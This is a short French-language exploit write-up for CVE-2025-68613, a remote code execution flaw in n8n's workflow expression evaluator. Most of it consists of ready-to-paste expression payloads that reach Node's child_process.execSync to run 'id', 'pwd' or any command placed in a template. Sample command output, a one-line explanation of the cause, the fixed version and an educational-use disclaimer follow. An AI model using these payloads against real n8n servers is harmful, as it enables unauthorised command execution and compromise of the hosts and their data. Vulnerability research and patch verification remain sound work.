
CVE-2025-68613 : exploit et documentation de la vulnérabilité RCE de n8n
n8n contient une vulnérabilité critique d'exécution de code arbitraire dans son système d'évaluation des expressions de workflows. Dans certaines conditions, les expressions fournies par des utilisateurs authentifiés lors de la configuration d'un workflow peuvent être évaluées dans un contexte d'exécution insuffisamment isolé du runtime sous-jacent.
Collez ce payload dans le champ d'expression :
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Commande ID :
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Commande PWD :
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Modèle de commande personnalisée :
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Pour la commande id :
uid=1000(node) gid=1000(node) groups=1000(node)
Pour la commande pwd :
/app
L'évaluateur d'expressions ne dispose d'aucun mécanisme d'assainissement pour empêcher les expressions de fonction d'accéder à this.process (l'objet process de Node.js), ce qui permet d'accéder aux modules système.
Mettez à niveau vers n8n v1.122.0 ou une version ultérieure.
Avertissement : Ces informations sont fournies uniquement à des fins de sandbox et d'éducation. Toute utilisation non autorisée de ces informations pour exploiter des systèmes est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester ou d'exploiter des vulnérabilités.